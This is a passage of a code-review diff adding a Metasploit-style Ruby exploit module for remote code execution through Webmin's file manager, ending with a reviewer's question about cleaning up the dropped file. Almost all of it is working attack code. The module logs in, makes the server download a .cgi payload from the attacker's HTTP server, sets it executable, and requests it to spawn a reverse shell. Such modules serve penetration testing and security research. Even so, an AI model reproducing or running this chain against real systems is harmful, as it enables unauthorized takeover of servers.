modules/exploits/linux/http/webmin_file_manager_rce.rb

```diff
@@ -0,0 +1,147 @@
+      ]
+    )
+  end
+
+  def check
+    webmin_check('1.984')
+  end
+
+  def login
+    webmin_login(datastore['USERNAME'], datastore['PASSWORD'])
+  end
+
+  def download_remote_url
+    print_status('Fetching payload from HTTP server')
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'], '/extensions/file-manager/http_download.cgi?module=filemin'),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'data' => 'link=' + get_uri + '.cgi' + '&username=&password=&path=%2Fusr%2Fshare%2Fwebmin',
+      'headers' => {
+        'Accept' => 'application/json, text/javascript, */*; q=0.01',
+        'Accept-Encoding' => 'gzip, deflate',
+        'Content-Type' => 'application/x-www-form-urlencoded; charset=UTF-8',
+        'X-Requested-With' => 'XMLHttpRequest',
+        'Referer' => 'http://' + datastore['RHOSTS'] + ':' + datastore['RPORT'].to_s + '/filemin/?xnavigation=1'
+      }
+    })
+
+    fail_with(Failure::UnexpectedReply, 'Unable to download .cgi payload from http server') unless res
+    fail_with(Failure::UnexpectedReply, 'please properly configure the http server, it could not be found by webmin') if res.body.include?('Error: No valid URL supplied!')
+  end
+
+  def modify_permissions
+    print_status('Modifying the permissions of the uploaded payload to 0755')
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/extensions/file-manager/chmod.cgi?module=filemin&page=1&paginate=30'),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'headers' => {
+        'Referer' => 'http://' + datastore['RHOSTS'] + ':' + datastore['RPORT'].to_s + 'filemin/?xnavigation=1'
+      },
+      'vars_post' => {
+        'name' => @file_name,
+        'perms' => '0755',
+        'applyto' => '1',
+        'path' => '/usr/share/webmin'
+      }
+    })
+    fail_with(Failure::UnexpectedReply, 'Unable to modify permissions on the upload .cgi payload') unless res && res.code == 302
+  end
+
+  def exec_revshell
+    res = send_request_cgi(
+      'method' => 'GET',
+      'keep_cookies' => true,
+      'uri' => normalize_uri(datastore['TARGETURI'], @file_name),
+      'headers' => {
+        'Connection' => 'keep-alive'
+      }
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Unable to execute the .cgi payload') unless res && res.code == 500
+  end
+
+  def on_request_uri(cli, request)
+    print_status("Request '#{request.method} #{request.uri}'")
+    print_status('Sending payload ...')
+    send_response(cli, payload.encoded,
+                  'Content-Type' => 'application/octet-stream')
+  end
+
+  def exploit
+    start_service
+    @file_name = (get_resource.gsub('/', '') + '.cgi')
+    cookie = login
+    fail_with(Failure::BadConfig, 'Unsucessful login attempt with creds') if cookie.empty?
+    print_status('Downloading remote url')
+    download_remote_url
+    print_status('Finished downloading remote url')
+    modify_permissions
+    exec_revshell
```

Comment:
Is there a way to delete the payload either via FileDropper's `register_file_for_cleanup()` or via webmin's file manager utilities?